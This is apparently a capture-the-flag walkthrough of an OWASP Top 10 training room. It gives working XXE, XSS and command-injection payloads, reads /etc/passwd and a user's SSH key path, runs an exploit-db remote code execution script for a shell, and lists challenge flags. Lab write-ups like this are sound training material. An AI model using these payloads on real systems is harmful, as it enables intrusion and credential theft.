Hello!
This room is huge, it covers all of the OWASP Top 10, which are the Top 10 Web Application Security Risks according to the Open Web Application Security Project (OWASP) Foundation. Since there are so many tasks, I will keep the explanations rather short and might go more in-depth in individual posts later on.
Task 5 – Command Injection Pratical
For this task, there is already a web shell on <ip>/evilshell.php online where you can just enter the comands.
What strange text file is in the website root directory?
ls
How many non-root/non-service/non-daemon users are there?
cat /etc/passwd
Usually, normal Users have an UserID / Group ID > 1000 – there are none. So the answer is 0.
What user is this app running as?
whoami
What is the user’s shell set as?
This is also shown in the /etc/passwd file:
What version of Ubuntu is running?
cat /etc/*release or lsb_release -a
Print out the MOTD. What favorite beverage is shown?
cat /etc/update-motd.d/00-header
run-parts /etc/update-motd.d
I tried these two commands, which show you the MOTD – but for me there was no beverage in sight. But since we already found our drpepper.txt file… you guessed it, the answer is “Dr Pepper”.
Task 7 – Broken Authentication
What is the flag that you found in darren’s account?
First we try to register as “darren” and get the error. But if you register as “ darren” and then log in, you will be in the “darren” account and will see the flag.
fe86079416a21a3c99937fea8874b667
Now try to do the same trick and see if you can login as arthur.
Repeat and yes you can
What is the flag that you found in arthur’s account?
d9ac0f7db4fda460ac3edeb75d75e16e
Task 11 – Sensitive Data Exposure
Have a look around the webapp. The developer has left themselves a note indicating that there is sensitive data in a specific directory.
Okay, if we inspect the source of the sight, right click inspect element or view page source code. On the main page is nothing, but on the login page is a nice comment:
Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?
Just go to /assets in the browser and klick on it to download it.
Use the supporting material to access the sensitive data. What is the password hash of the admin user?
Open the file with sqlite3 webapp.db and look which tables are there with .tables. Then you can use SELECT * FROM USERS; and get the needed hash:
6eea9b7ef19179a06954edd0f6c05ceb
Which you just enter into crackstation.net and get the answer for the next question.
What is the admin’s plaintext password?
qwertyuiop
Login as Admin. What is the flag?
After you login it is shown on the site – can’t miss it.
Task 13 XML External Entity
All of the answers can be found in the text explaining the task.
Full form of XML
extensible markup language
Is it compulsory to have XML prolog in XML documents?
no
Can we validate XML documents against a schema?
yes
How can we specify XML version and encoding in XML documents?
XML prolog
Task 14 XML External Entity – DTD
How do you define a new Element?
!ELEMENT
How do you define a ROOT element?
!DOCTYPE
How do you define a new ENTITY?
This one actually wasn’t explained before this task, but it’s like the other with an exclamation mark.
!ENTITY
Task 15 XXE Payload
Try the payload mentioned in description.
Needs no answer but if you copy the payload
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
into the field it will display the contents of /etc/passwd – nice.
Task 16 XXE Exploiting
Try to display your own name using any payload.
Again, no answer needed, but if you change the entity to
<!ENTITY read 'yourname'>
it will print yourname on the screen.
See if you can read the /etc/passwd file
Yes – already done that.
What is the name of the user in /etc/passwd
Where is falcon’s SSH key located?
So… I tried some things on this, like getting directory listings through the XXE, but couldn’t get it working. But hey – look at this, it is just the standard location:
/home/falcon/.ssh/id_rsa
What are the first 18 characters for falcon’s private key
Ok so that’s the most annoying thing about the in browser attack box – at least on my computers – I can’t copy stuff into it or out of it. Not even text via the clipboard. But yeah, just query the id_rsa file like before the etc file and there you have it.
Task 18 Broken Access Control – IDOR Challenge
Read and understand how IDOR works.
I believe in you.
Deploy the machine…
You can do it.
Look at other users notes. What is the flag?
Ok once we logged in, we see a note=1 URL-Parameter. We can change it and try to access other notes… I got so far that I fired up burpsuite and got to 150 before I had the idea to try zero. That was it.
Task 19 Security Misconfigurations
Hack into the webapp, and find the flag!
Well, I took some time to look around on the site – but there wasn’t much to find so guess what, I googled the name of the app and you can find it actually on GitHub. On the GitHub page you find the default credentials pensive:PensiveNotes and after you use them to login you are presented with the flag:
And if you are too lazy to solve it yourself or to type it, here it is:
thm{4b9513968fd564a87b28aa1f9d672e17}
Task 20 XSS Cross-Site Scripting
Navigate to <ip adress> in your browser and click on the “Reflectes XSS tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.
On the site is a search field, just enter <script>alert(”Hello”)</script> and you get the flag. Nice.
ThereIsMoreToXSSThanYouThink
On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.
To get the IP of the machine, which is also the host of the website, you can use the window.location.hostname object. So we just alter the last payload to <script>alert(window.location.hostname)</script> and get the flag.
ReflectiveXss4TheWin
Now navigate to <ip address> in your browser and click on the “Stored XSS” tab on the navbar; make an account. Then add a comment and see if you can insert some of your own html.
Okay, I just register as test:test and go to the page again. I try the “hello” payload again, and just post it as a comment… which works, but doesn’t give me the flag. Or did it? After I add a <h1>”Hello”</h1> too, the flag is displayed, but not as a popup, just on the page. I might have just missed it after the first try.
On the same page, create an alert popup box appear on the page with your document cookies.
So the cookies of a page are stored in the document.cookie object – if we alter the payload from before to <script>alert(document.cookie)</script> and post it as a comment we get to see something like this:
And after that a pop up with the flag: W3LL_D0N3_LVL2
Change “XSS Playground” to “I am a hacker” by adding a comment and using Javascript.
So first we have to check how we can access the text in the header. If you inspect the html of the site we find the id of the banner:
Now we can use Javascript to access this element by its ID and change its innerHTML property, which is the displayed text. To do that we use our simple payload from before and change it a little bit again. <script>document.getElementById("thm-title").innerHTML="I am a hacker"</script> which does the trick:
After that, the flag is revealed on the page, directly after the question.
websites_can_be_easily_defaced_with_xss
Another option to do that would be <script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script> – it is the hint.
Task 21 Insecure Deserialization
Who developed the Tomcat application?
Google says: The Apache Software Foundation
What type of attack that crashes services can be performed with insecure deserialization?
Denial of Service
Task 22 Insecure Deserialization – Objects
If a dog was sleeping, would this be: a state or a behaviour?
If you ask me, it’s a strange definition. Sleeping for me would be a state. Going to sleep a behaviour… Like the lamp example in the switching the light would alter its state of being on or of… but whatever. The answer they want is:
a behaviour
Task 23 Insecure Deserialization – Deserialization
What is the name of the base-2 formatting that data is sent across a network as?
binary
Task 24 Insecure Deserialization – Cookies
If a cookie had the path of webapp.com/login, what would the URL that the user has to visit be?
What is the acronym for the web technology that Secure cookies work over?
https
Task 25 Insecure Deserialization – Cookies Practical
Open the webpage and click on “Exchange Today” to signup. I use testuser:testpassword. Then check the “storage” tab in your browser developer tools (right click the page an select inspect element) to see the cookies. The sessionId is base64 encoded so you can use a online tool like CyberChef or your terminal to decode it and you get the first flag.
For the second flag you just have to change the userType cookie from user to admin. To do that just double click it and write it in. Then head to the <ip address>/admin page and there it is.
Task 26 Insecure Deserialization – Code Execution
Ok, first change back the cookie value to user and head back to the /myprofile site. Then just follow the instructions of this task. They are very detailed. If you follow them correctly you have a reverse shell to the machine. There you just cd back into the home directory and cat the flag.txt file.
Task 29 Components with Known Vulnerabilities – Lab
We get an app, which we should exploit by using online material.
Okay, the first thing we see is this:
So I google “CSE Bookstore Vulnerability” and find two hits on exploit db – one authentication bypass via SQL Injection, with that one we can log in on the admin panel. Not what we want right now. And an Unauthenticated Remote Code Execution – that one sounds nice. I downloaded it an executed it with
python3 47887.py http://10.10.243.37
and got a nice shell.
Then we just use wc -c /etc/passwd and get the answer to the question which is 1611.
Task 30 Insufficient Logging and Monitoring
Well isn’t that a cute “log-file”. Pretty short but ok.
What IP address is the attacker using?
Just cat the file and it should be obvious.
It’s 49.99.13.16
What kind of attack is being carried out?
It is called a “brute force” attack. Were the attacker is trying to guess the right combination of user and password.
So that’s it! A lot of different topics in this room, but it is a good overview!